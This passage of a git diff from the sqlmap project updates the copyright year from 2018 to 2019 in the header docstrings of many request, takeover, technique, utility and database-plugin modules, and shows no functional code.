3c503f9fb12..a9b95890ef4 100644 --- a/lib/parse/sitemap.py +++ b/lib/parse/sitemap.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/__init__.py b/lib/request/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/request/__init__.py +++ b/lib/request/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/basic.py b/lib/request/basic.py index f60ead067cd..5452ea99c0e 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index 81f4943130a..e686226526f 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/comparison.py b/lib/request/comparison.py index 146150ac92c..ef0a6f11dcf 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/connect.py b/lib/request/connect.py index eac8a2c8581..bc4f6714599 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/direct.py b/lib/request/direct.py index 9b679fc52a3..c4a8a5b22b9 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/dns.py b/lib/request/dns.py index 2cf11fe83a0..9eeb7630e07 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index a98bdc71b0d..33a9dfc8b66 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/inject.py b/lib/request/inject.py index 34271e1dfe2..38fe6da5b8c 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py index 7187c4404d7..e07f4765fa9 100644 --- a/lib/request/methodrequest.py +++ b/lib/request/methodrequest.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index 71a5eb352ac..f34aedf2bea 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 6c7e33ffa8d..0f62c4da619 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 6248ce3c1dc..81c0cb5d2ea 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/request/templates.py b/lib/request/templates.py index ff8ac82fe35..6f8f155e02b 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/takeover/__init__.py +++ b/lib/takeover/__init__.py 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 490c8c2987e..81db1bcb5f9 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py
index f2c0f609cf4..4be69f4685d 100644
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index c7a4e18bd7d..d42747b54c4 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py
index 00b5183a7b2..5b83526c006 100644
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index 7e2d46dd2e0..e5f7c9e5049 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 921366a00b1..445270f285e 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index e2f92441d3f..d4db1a6b59a 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/lib/techniques/__init__.py
+++ b/lib/techniques/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/lib/techniques/blind/__init__.py
+++ b/lib/techniques/blind/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 484666e0cfe..ce869360e7e 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/lib/techniques/dns/__init__.py
+++ b/lib/techniques/dns/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py
index 7a580e6e5c4..361a3b088f0 100644
--- a/lib/techniques/dns/test.py
+++ b/lib/techniques/dns/test.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index a90967e99d5..7a37736d99f 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/lib/techniques/error/__init__.py
+++ b/lib/techniques/error/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index c252570b932..f6ded61f17d 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/lib/techniques/union/__init__.py
+++ b/lib/techniques/union/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 6197cce432e..e8bd84546c7 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py
index 49624d59c63..163f6276188 100644
--- a/lib/techniques/union/use.py
+++ b/lib/techniques/union/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/lib/utils/__init__.py
+++ b/lib/utils/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/api.py b/lib/utils/api.py
index ed97128aadd..2faa81a6de6 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -2,7 +2,7 @@
 # -*- coding: utf-8 -*-
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/brute.py b/lib/utils/brute.py
index 148a69d6a91..ff4e7c17b54 100644
--- a/lib/utils/brute.py
+++ b/lib/utils/brute.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index bcd9495fccb..7ceb98a7378 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/deps.py b/lib/utils/deps.py
index 937a21c8cce..265c0eb87fd 100644
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/getch.py b/lib/utils/getch.py
index d2c204ac4c5..733fdf57078 100644
--- a/lib/utils/getch.py
+++ b/lib/utils/getch.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/har.py b/lib/utils/har.py
index 4def9b3db45..252da45d179 100644
--- a/lib/utils/har.py
+++ b/lib/utils/har.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 39e9b2ea13a..3985670f96b 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py
index b3f77358b8b..d8206b55661 100644
--- a/lib/utils/hashdb.py
+++ b/lib/utils/hashdb.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py
index 399e3580c43..a97320ec098 100644
--- a/lib/utils/htmlentities.py
+++ b/lib/utils/htmlentities.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py
index 03e2226a8c5..8849cbfcda3 100644
--- a/lib/utils/pivotdumptable.py
+++ b/lib/utils/pivotdumptable.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/progress.py b/lib/utils/progress.py
index 1776fb25ade..785f0d4d49d 100644
--- a/lib/utils/progress.py
+++ b/lib/utils/progress.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/purge.py b/lib/utils/purge.py
index aab84005807..5604aba670d 100644
--- a/lib/utils/purge.py
+++ b/lib/utils/purge.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/search.py b/lib/utils/search.py
index e2cca24b948..8046c156206 100644
--- a/lib/utils/search.py
+++ b/lib/utils/search.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py
index 928bdeda9bd..8717561f389 100644
--- a/lib/utils/sqlalchemy.py
+++ b/lib/utils/sqlalchemy.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py
index a50902d9a62..6e585365253 100644
--- a/lib/utils/timeout.py
+++ b/lib/utils/timeout.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py
index c78b6954506..7e17f28bc65 100644
--- a/lib/utils/versioncheck.py
+++ b/lib/utils/versioncheck.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py
index 9ae8e55860b..5cac24310f2 100644
--- a/lib/utils/xrange.py
+++ b/lib/utils/xrange.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/__init__.py b/plugins/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/plugins/__init__.py
+++ b/plugins/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/plugins/dbms/__init__.py
+++ b/plugins/dbms/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py
index 27da4be82fd..3529701b07d 100644
--- a/plugins/dbms/access/__init__.py
+++ b/plugins/dbms/access/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py
index 13dc3c12471..ff10504a217 100644
--- a/plugins/dbms/access/connector.py
+++ b/plugins/dbms/access/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py
index c74aed8bcf4..22276102448 100644
--- a/plugins/dbms/access/enumeration.py
+++ b/plugins/dbms/access/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py
index 8c02c9804aa..7d0006c8d4f 100644
--- a/plugins/dbms/access/filesystem.py
+++ b/plugins/dbms/access/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index ca44557bef1..339edba51ca 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py
index b1a5131a7a9..f6cd030efd8 100644
--- a/plugins/dbms/access/syntax.py
+++ b/plugins/dbms/access/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py
index 651cff65183..e12c4d9adb0 100644
--- a/plugins/dbms/access/takeover.py
+++ b/plugins/dbms/access/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py
index 3f642ab0586..6bf0091cf6a 100644
--- a/plugins/dbms/db2/__init__.py
+++ b/plugins/dbms/db2/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py
index 73f7ebba47b..a1906dc7c5e 100644
--- a/plugins/dbms/db2/connector.py
+++ b/plugins/dbms/db2/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py
index e79d281a863..129ef027896 100644
--- a/plugins/dbms/db2/enumeration.py
+++ b/plugins/dbms/db2/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py
index 4699cb9b634..4f0d86be78e 100644
--- a/plugins/dbms/db2/filesystem.py
+++ b/plugins/dbms/db2/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py
index 364e89d31af..dd6e34af9b9 100644
--- a/plugins/dbms/db2/fingerprint.py
+++ b/plugins/dbms/db2/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py
index 64f08a7c4ea..c0aacd60fd8 100644
--- a/plugins/dbms/db2/syntax.py
+++ b/plugins/dbms/db2/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py
index ba8026e8880..ca204b03495 100644
--- a/plugins/dbms/db2/takeover.py
+++ b/plugins/dbms/db2/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py
index 602855ddc3b..f35a4070ecd 100644
--- a/plugins/dbms/firebird/__init__.py
+++ b/plugins/dbms/firebird/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py
index 42e2ea925f1..a38232d4100 100644
--- a/plugins/dbms/firebird/connector.py
+++ b/plugins/dbms/firebird/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py
index 9d5e915ed8e..406347a5e31 100644
--- a/plugins/dbms/firebird/enumeration.py
+++ b/plugins/dbms/firebird/enumeration.py
@@ -1,7 +1,7 @@
